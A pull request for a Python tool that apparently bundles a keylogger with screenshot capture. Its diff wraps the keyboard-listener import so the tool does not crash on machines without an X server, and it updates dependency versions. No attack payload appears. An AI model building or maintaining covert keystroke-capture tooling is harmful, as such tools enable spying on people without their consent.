### PR TITLE
Disable keylogger when we don't have X

### DIFF
--- a/mods/imports.py
+++ b/mods/imports.py
@@ -14,4 +14,9 @@ import subprocess
 import threading
 import pyscreenshot
 from datetime import datetime
-from pynput.keyboard import Key, Listener
+import Xlib
+try:
+    from pynput.keyboard import Listener
+    HAVE_X = True
+except Xlib.error.DisplayNameError:
+    HAVE_X = False

--- a/requirements.txt
+++ b/requirements.txt
@@ -1,6 +1,6 @@
-tabulate==0.8.2
+tabulate==0.9.0
 pyinstaller==3.6
 pynput==1.6.8
 psutil==5.7.0
-pillow==7.2.0
+pillow>=7.2.0
 pyscreenshot==2.2


### PR DESCRIPTION
When this tool is run on a box without an X server running, it crashes.  This commit handles the crash and disables the keylogger when no X server is available.